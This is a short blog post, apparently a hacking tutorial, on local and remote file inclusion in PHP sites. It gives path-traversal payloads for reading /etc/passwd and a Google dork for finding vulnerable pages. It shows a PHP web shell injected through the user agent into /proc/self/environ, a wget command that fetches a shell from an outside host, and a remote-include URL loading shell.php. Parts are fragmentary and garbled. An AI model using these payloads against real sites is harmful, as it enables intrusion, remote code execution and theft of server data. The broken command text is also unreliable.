LFI- local file inclusion & RFI - Remote file inclusion

LFI- local file inclusion

Its  include the file of the server in our browser..
To see if a script is vulnerable to local file inclusion,

index.php?page=../../../../../../../../../etc/passwd


That Shows the complete User information in that server with paths..
Where ../ causes the script to move up one directoryWhere directory,
Multiple ../ cause the script to move to the top level directory (/, the root of the
filesystem) and /etc/passwd is the Unix passwd file.

google dork: inurl:.php?page=


example:www.xxx.com/contacts.php?page=abc.php

test:www.xxx.com/contacts.php?page=../xyz.php

now in linux server server there is etc/password 

1... www.xyz.com/index
../
=../../../etc/passwd
=../../../etc/passwd

etc/passwdfile (google)
proc/self/environ is the writable file by end
or var/log/httpd-access.log is also writable

proc/self/environ
add one- user agent switcher 

config.php
<?php passthru($_GET['cmd']) ?>
../proc/self//environ&cmd=wget http://
t35.com/abc.txt O shell.php

config.php
ip
username
pwd

Done..
----------------------------------------------------------------------------------------------

RFI - Remote file inclusion


Remote File Inclusion (RFI) is a type of vulnerability most often found on websites.
It allows an attacker to include a remote file, usually through a script on the web
server. The vulnerability occurs due to the use of user-supplied input without
proper validation. This can lead to something as minimal as outputting the contents
 of the  file, but depending on the severity, to list a few it can lead to:


    ->  Code execution on the web server
   ->  Code execution on the client-side such as JavaScript which can lead to other
     attacks such as cross site scripting (XSS).

   -> Denial of Service (DoS)
   -> Data Theft/Manipulation

By default allow_url_include is ON -----> in php.ini

www.xxx.com/contacts.php?page=http://www.abc.com/shell.php


>> TOOL Descriptions:

FIMAP
FIMAP is a Local and Remote file inclusion auditing Tool (LFI/RFI).
Fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection.  

Download 



Local File Inclusion Vulnerability Scanner


Description:
The Simple Local File Inclusion Vulnerability Scanner helps you to find LFI vulnerabilities.
This tool is only able to handle “simple” LFI vulnerabilities, but not complex ones.

Usage:
./lfi_scanner.py –url=

Usage example:
./lfi_scanner.py –url=”http://www.example.com/page.php?file=mai

Download Script
SHARE

About Unknown

    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment